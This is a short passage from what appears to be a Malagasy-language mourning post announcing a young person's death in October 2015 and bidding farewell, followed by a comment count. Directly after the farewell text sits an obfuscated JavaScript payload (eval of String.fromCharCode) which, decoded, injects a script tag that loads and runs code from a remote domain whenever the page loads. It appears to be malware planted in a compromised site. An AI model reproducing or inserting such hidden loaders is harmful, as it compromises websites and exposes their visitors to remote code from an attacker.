ny fitsaboana azy, fa @ naha tanora azy dia nataonay izay rehetra tokony natao nefa indrisy izay no lahatra….. lasa ny alatsinainy 05/10/2015 izy izay,  ny ora napetraka diaa 15h satria izay no nahitana ny valin’ny IRM natao taminy…….

Veloma indrindra e!!!!!!!!!eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


120 comments